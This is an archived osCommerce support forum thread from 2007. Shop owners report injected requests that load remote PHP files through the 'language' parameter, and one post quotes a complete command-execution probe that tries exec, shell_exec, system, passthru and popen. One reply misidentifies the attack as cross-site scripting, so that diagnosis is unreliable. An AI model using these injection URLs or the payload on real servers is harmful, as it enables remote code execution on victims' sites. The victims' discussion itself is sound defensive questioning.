Guest Posted January 20, 2007 Posted January 20, 2007 Just found this in my whos online list. How did it get there is it a virus? /index.php?Language=http%3A%2F%2Fbeforethehighway.com%2Fphpmyadm Do not open the link to beforethehighway as it contains a virus. Any ideas on how to remove this or wher it might be found on the site?
larp-fashion Posted July 24, 2007 Posted July 24, 2007 Hi, we have currently a similar problem. When I look into the who's online page, there are often page requests like this ...shop/index.php?language=http://n2k.xlphp.net/atrix.txt The content of the text-file is <?php echo "Mic22"; $cmd="id"; $eseguicmd=ex($cmd); echo $eseguicmd; function ex($cfe){ $res = ''; if (!empty($cfe)){ if(function_exists('exec')){ @exec($cfe,$res); $res = join("n",$res); } elseif(function_exists('shell_exec')){ $res = @shell_exec($cfe); } elseif(function_exists('system')){ @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('passthru')){ @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = @popen($cfe,"r"))){ $res = ""; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); }} return $res; } exit; may this be dangerous? Martin
oschellas Posted July 25, 2007 Posted July 25, 2007 Seems you have been hacked through XSS (cross site scripting). Either you are using an older version of osCommerce which had some vulnerabilities, or you are using one or more contributions which are vulnerable for XSS. It would be a good thing to update to the latest osCommerce version and check your contributions. Maybe the above posters have some contributions in common?
larp-fashion Posted July 27, 2007 Posted July 27, 2007 does an entry in the who-is-online like the above mean that the hack was successful or was it just a try? Is it possible to forward requests with this to any site maybe like if length ($HTTP_GET_VARS['language'] )>2 redirect(anysite.com) Regards
Recommended Posts
Archived
This topic is now archived and is closed to further replies.